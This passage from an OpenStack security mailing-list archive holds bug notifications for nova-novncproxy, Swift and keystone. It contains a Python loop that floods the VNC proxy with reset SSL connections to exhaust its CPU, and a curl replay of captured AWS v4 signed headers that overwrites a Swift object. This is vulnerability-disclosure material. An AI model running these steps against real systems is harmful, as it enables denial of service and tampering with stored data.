nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1816727 at bugs.launchpad.net Wed Mar 20 20:41:38 2019 From: 1816727 at bugs.launchpad.net (melanie witt) Date: Wed, 20 Mar 2019 20:41:38 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155311450022.19282.12942911233060396713.launchpad@chaenomeles.canonical.com> ** Changed in: nova Importance: Undecided => Medium ** Tags added: console -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1765834 at bugs.launchpad.net Wed Mar 20 23:53:01 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 23:53:01 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155312598157.18692.1941630739827836081.malone@chaenomeles.canonical.com> Reviewed: https://review.openstack.org/629301 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Submitter: Zuul Branch: master commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 Closes-Bug: 1765834 ** Changed in: swift Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1792047 at bugs.launchpad.net Thu Mar 21 14:56:30 2019 From: 1792047 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 21 Mar 2019 14:56:30 -0000 Subject: [Openstack-security] [Bug 1792047] Fix included in openstack/keystone 15.0.0.0rc1 References: <153670878287.17124.3225642471309073829.malonedeb@chaenomeles.canonical.com> Message-ID: <155318019093.10444.14741881233120587464.malone@wampee.canonical.com> This issue was fixed in the openstack/keystone 15.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1792047 Title: keystone rbacenforcer not populating policy dict with view args Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) rocky series: Fix Committed Status in OpenStack Identity (keystone) stein series: Fix Released Bug description: The old @protected decorator pushed the view arguments into the policy_dict for enforcement purposes[0]. This was missed in the new RBACEnforcer. [0] https://github.com/openstack/keystone/blob/294ca38554bb229f66a772e7dba35a5b08a36b20/keystone/common/authorization.py#L152 To manage notifications about this bug go 